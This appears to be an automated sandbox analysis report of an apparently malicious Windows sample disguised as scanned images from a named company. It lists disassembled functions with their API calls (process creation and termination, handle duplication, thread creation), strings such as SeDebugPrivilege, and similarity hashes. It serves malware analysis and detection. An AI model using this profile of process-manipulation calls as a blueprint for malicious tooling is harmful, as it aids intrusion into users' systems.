                                                        Function 00AA653C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AA655B
                                                        • GetWindowLongW.USER32(01776368,000000F0), ref: 00AA658E
                                                        • GetWindowLongW.USER32(01776368,000000F0), ref: 00AA65C3
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AA65F5
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AA661F
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00AA6630
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AA664A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 2178440468-2594219639
                                                        • Opcode ID: 4246b0685d70da014026ee7a4da37328dd92fd1cc60e0f84f065e7d6e7e47564
                                                        • Instruction ID: 03d8fbf0710cd7a266d3db82a3838b26a0814977123f26602c947b9397fa42bc
                                                        • Opcode Fuzzy Hash: 4246b0685d70da014026ee7a4da37328dd92fd1cc60e0f84f065e7d6e7e47564
                                                        • Instruction Fuzzy Hash: 09310230A04292AFDB24CFA8DC88F553BE1FB6A350F1901A8F5118F2F5CB61A841DF41
                                                        Function 00A98F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00AAF910), ref: 00A9903D
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00AAF910), ref: 00A99071
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A991EB
                                                        • SysFreeString.OLEAUT32(?), ref: 00A99215
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: c8fce61c8675f9bbf9bfb05de3fd04ed6145c1b815b6c5ead9977a88f5d497df
                                                        • Instruction ID: 1b282f87d114da4559f47200ad993e8fa0140f746a23df7555e79a4b2952c14c
                                                        • Opcode Fuzzy Hash: c8fce61c8675f9bbf9bfb05de3fd04ed6145c1b815b6c5ead9977a88f5d497df
                                                        • Instruction Fuzzy Hash: 79F12871A00119EFDF04DF98C888EAEB7B9BF49315F208159F515AB291DB31AE46CB50
                                                        Function 00A9F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A9F9C9
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FB5C
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FB80
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FBC0
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FBE2
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A9FD5E
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A9FD90
                                                        • CloseHandle.KERNEL32(?), ref: 00A9FDBF
                                                        • CloseHandle.KERNEL32(?), ref: 00A9FE36
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: 36e320bc16126000936b56b242db06224a0675bde169641bdd9d4cff4d996bbc
                                                        • Instruction ID: 1d20adef6424834c06e6d079a09671d4e3a90b2cf96f6eb3905253c444c0170b
                                                        • Opcode Fuzzy Hash: 36e320bc16126000936b56b242db06224a0675bde169641bdd9d4cff4d996bbc
                                                        • Instruction Fuzzy Hash: 2FE1A131604301DFCB24EF24D991B6BBBE1AF89354F14896DF8998B2A2DB31DC45CB52
                                                        Function 00A84F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A838D3,?), ref: 00A848C7
                                                          • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A838D3,?), ref: 00A848E0
                                                          • Part of subcall function 00A84CD3: GetFileAttributesW.KERNEL32(?,00A83947), ref: 00A84CD4
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00A84FE2
                                                        • _wcscmp.LIBCMT ref: 00A84FFC
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A85017
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: aef86addb1908d345771e6df16388150d2b454178c7cff5551275ae8c378411c
                                                        • Instruction ID: 0ee99979b155b03c4f12c159a704988aee9edf876b4778b50ed394500405a85e
                                                        • Opcode Fuzzy Hash: aef86addb1908d345771e6df16388150d2b454178c7cff5551275ae8c378411c
                                                        • Instruction Fuzzy Hash: 015186B24087859BC724EBA0D9819DFB7ECAF85340F40492EB689D3151EF74A68CC766
                                                        Function 00A78E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A78A84,00000B00,?,?), ref: 00A78E0C
                                                        • HeapAlloc.KERNEL32(00000000,?,00A78A84,00000B00,?,?), ref: 00A78E13
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A78A84,00000B00,?,?), ref: 00A78E28
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00A78A84,00000B00,?,?), ref: 00A78E30
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A78A84,00000B00,?,?), ref: 00A78E33
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A78A84,00000B00,?,?), ref: 00A78E43
                                                        • GetCurrentProcess.KERNEL32(00A78A84,00000000,?,00A78A84,00000B00,?,?), ref: 00A78E4B
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A78A84,00000B00,?,?), ref: 00A78E4E
                                                        • CreateThread.KERNEL32(00000000,00000000,00A78E74,00000000,00000000,00000000), ref: 00A78E68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 9ecd551fb16794ccd3ede14d9fd34bd829719e40428bbf9e680368b9ff2a2a72
                                                        • Instruction ID: 613b1a6308ed18ee0c82b0f4e9f41261bb3a38a4ed273bf73ddb52970292b7bb
                                                        • Opcode Fuzzy Hash: 9ecd551fb16794ccd3ede14d9fd34bd829719e40428bbf9e680368b9ff2a2a72
                                                        • Instruction Fuzzy Hash: 0D0196B5240309FFE660EBE5DC49F6B7BACEB89711F008521FB05DB1A1DB7498018A20
                                                        Function 00A99428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: 150ff62167161f6e85388d1711e91197ce5d02142dd2c1eb3fc883f3cf5b5e0d
                                                        • Instruction ID: 929dde032fe3944cbd2d84d48c47b5b82deee09046152283f53180a78ae76cf4
                                                        • Opcode Fuzzy Hash: 150ff62167161f6e85388d1711e91197ce5d02142dd2c1eb3fc883f3cf5b5e0d
                                                        • Instruction Fuzzy Hash: CC917B71A00219BBDF24DFA9C844FAFBBB8EF85710F10855EF615AB280D7709945CBA0
                                                        Function 00A99A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A77652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?,?,00A7799D), ref: 00A7766F
                                                          • Part of subcall function 00A77652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A7768A
                                                          • Part of subcall function 00A77652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A77698
                                                          • Part of subcall function 00A77652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?), ref: 00A776A8
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A99B1B
                                                        • _memset.LIBCMT ref: 00A99B28
                                                        • _memset.LIBCMT ref: 00A99C6B
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00A99C97
                                                        • CoTaskMemFree.OLE32(?), ref: 00A99CA2
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 00A99CF0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 1f389df508fab6300f84697767495b0719d2c5902ded2a76a3bd169728487324
                                                        • Instruction ID: 71c1fb0fc1519832f19bd3be182ef65b14f17cb6c8f874a96f209b8beb25b588
                                                        • Opcode Fuzzy Hash: 1f389df508fab6300f84697767495b0719d2c5902ded2a76a3bd169728487324
                                                        • Instruction Fuzzy Hash: 64913A71D00229AFDF10DFA8DD85ADEBBB8BF08710F20416AF419A7281DB315A45CFA0
                                                        Function 00A9EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A83E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00A83EB6
                                                          • Part of subcall function 00A83E91: Process32FirstW.KERNEL32(00000000,?), ref: 00A83EC4
                                                          • Part of subcall function 00A83E91: CloseHandle.KERNEL32(00000000), ref: 00A83F8E
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9ECB8
                                                        • GetLastError.KERNEL32 ref: 00A9ECCB
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9ECFA
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A9ED77
                                                        • GetLastError.KERNEL32(00000000), ref: 00A9ED82
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A9EDB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: f6c0bfefb6fbe11199543428ea39130d9002cf47350cfb6a0392cf67f735cb0d
                                                        • Instruction ID: 720d9bd99f8292b6435789b31bf4906a2899d4a65317fa324d6289bdc82ef217
                                                        • Opcode Fuzzy Hash: f6c0bfefb6fbe11199543428ea39130d9002cf47350cfb6a0392cf67f735cb0d
                                                        • Instruction Fuzzy Hash: 9E41CC717002019FDB14EF64CD96F6EB7E0AF85714F088429F9469F2C2DB75A805CB92
                                                        Function 00AAB958 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00AE67B0,00000000,01776368,?,?,00AE67B0,?,00AAB862,?,?), ref: 00AAB9CC
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00AAB9F0
                                                        • ShowWindow.USER32(00AE67B0,00000000,01776368,?,?,00AE67B0,?,00AAB862,?,?), ref: 00AABA50
                                                        • ShowWindow.USER32(00000000,00000004,?,00AAB862,?,?), ref: 00AABA62
                                                        • EnableWindow.USER32(00000000,00000001), ref: 00AABA86
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AABAA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 642888154-2594219639
                                                        • Opcode ID: 67d3e57c4e196f27db0fa0f576217e7891c65ae0c91ace2cb66f5a3edc3d8482
                                                        • Instruction ID: be6fc0264b6a365aafcb1e8f0911648eaf454e66c3caa2d746225b2823c41dca
                                                        • Opcode Fuzzy Hash: 67d3e57c4e196f27db0fa0f576217e7891c65ae0c91ace2cb66f5a3edc3d8482
                                                        • Instruction Fuzzy Hash: CB414235610241AFDB25CFA4C889BA57BE1FF07354F1841B9EA498F6E3C731A846CB61
                                                        Function 00A83226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00A832C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 1a75b35dec99a8aa73a560a6e2271a02cde544f102104bd54275705d6c2d222c
                                                        • Instruction ID: 8bff8179c792bd46a88fcd3fc5697b686aa79822b066ae0e6dc1d1d164631ea4
                                                        • Opcode Fuzzy Hash: 1a75b35dec99a8aa73a560a6e2271a02cde544f102104bd54275705d6c2d222c
                                                        • Instruction Fuzzy Hash: 1F11E737248346BBAF057B55DC42CEAB3ACEF39B70F20006AF901A62C2F7655B4147A5
                                                        Function 00A84534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A8454E
                                                        • LoadStringW.USER32(00000000), ref: 00A84555
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A8456B
                                                        • LoadStringW.USER32(00000000), ref: 00A84572
                                                        • _wprintf.LIBCMT ref: 00A84598
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A845B6
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00A84593
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: a5566bb595f32a553e58d9db37614652a7afc0701b2ba42fedea675cb9719526
                                                        • Instruction ID: 48b6a14c4120c33605f4577e5477bacd2246a182620957bf5226a0bafef89cca
                                                        • Opcode Fuzzy Hash: a5566bb595f32a553e58d9db37614652a7afc0701b2ba42fedea675cb9719526
                                                        • Instruction Fuzzy Hash: 380162F6900209BFE754E7E0DD89EEB776CE709301F0005A5BB49D2091EB749E858B74
                                                        Function 00A22A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000), ref: 00A22ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000,000000FF), ref: 00A22B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000), ref: 00A5C46A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000), ref: 00A5C4D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 8b96c6cf65df9a65d04a365c2d8aabf99423157fce44ee67f12a87830a5729af
                                                        • Instruction ID: e895176cf9f94149ff6958859601e8f2759e6d5cdb6235c791c362f8f692c842
                                                        • Opcode Fuzzy Hash: 8b96c6cf65df9a65d04a365c2d8aabf99423157fce44ee67f12a87830a5729af
                                                        • Instruction Fuzzy Hash: EA4119302047D0BED7398B6CAD9CB7A7BB2BB56350F14883DE447469A1C7759886D710
                                                        Function 00A87368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A8737F
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A873B6
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00A873D2
                                                        • _memmove.LIBCMT ref: 00A87420
                                                        • _memmove.LIBCMT ref: 00A8743D
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00A8744C
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A87461
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A87480
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: b29e9f5a1a87530b24c5bf63fc1715f98cb59f230fe934da857ac00ef7579fc9
                                                        • Instruction ID: f69fecb26a10bc7eb848637cb5449cbd57d6ba06b39c1db80dcff9b347fdc3a5
                                                        • Opcode Fuzzy Hash: b29e9f5a1a87530b24c5bf63fc1715f98cb59f230fe934da857ac00ef7579fc9
                                                        • Instruction Fuzzy Hash: 5C31A135904205EFCF10EFA4DD85EAEBB78EF85310B1441B5F9049B286DB30DA55DBA0
                                                        Function 00A7C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
